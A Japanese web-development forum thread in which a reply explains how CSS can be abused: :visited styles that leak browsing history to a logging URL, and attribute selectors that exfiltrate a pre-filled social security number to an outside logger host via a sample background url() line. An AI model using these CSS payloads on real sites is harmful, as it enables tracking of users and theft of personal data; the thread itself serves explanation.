CSS

ウェブ開発

投稿するには今すぐ登録するかサインインしてください
最近のアクティビティ
よくある質問
ガイドライン

質問

クリエイター

トピック
CSS

matthewjohn938 ·約5年、5ヶ月前

CSS は HTML よりも悪用に対して脆弱ですか?
クリエイター

トピック

すべての答え

著者

返信
- 2020年4月30日午前9時54分#2418615
  
  CSS
  
  deborasumopayroll ·約5年、5か月前
  
  CSSへの返信
  
  訪問済みリンクに関する懸念は
  次のようになります:
  
  サイトに特定のページ、例えば「豚のくすぐり」へのリンクを設置します。
  そのリンクの訪問済み状態を a:visited { color: pink; } のようにスタイル設定します。これはデフォルトのユーザーエージェントスタイルではありません。そして、
  そのリンクの計算済みスタイルをテストします。
  ピンク色であれば、このユーザーは豚をくすぐる人です。
  豚がくすぐられる情報をどこかのサーバーに報告し、くすぐられることで豚は極度の精神的苦痛を被ることは間違いないため、豚を所有していることによる保険料をおそらく3倍にします。
  この処理をすべてCSSだけで実現できるかもしれません。なぜなら、:visited スタイルには、豚をくすぐる人だけが要求する background-image: url(/data-logger/tickle.php); のような記述を含めることができるからです。
  
  データ泥棒
  これは次のようになります:
  
  サイトに認証済みのページに不正な CSS を配置できた場合、
  そのサイトが社会保障番号 (SSN) などの機密情報を事前入力されたフォームに表示している場合、
  属性セレクターを使用してそれを解明できます。
  input#ssn[value=”123-45-6789″] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }
  セレクターが 10 億個あれば、あらゆる可能性をカバーできます。
著者

返信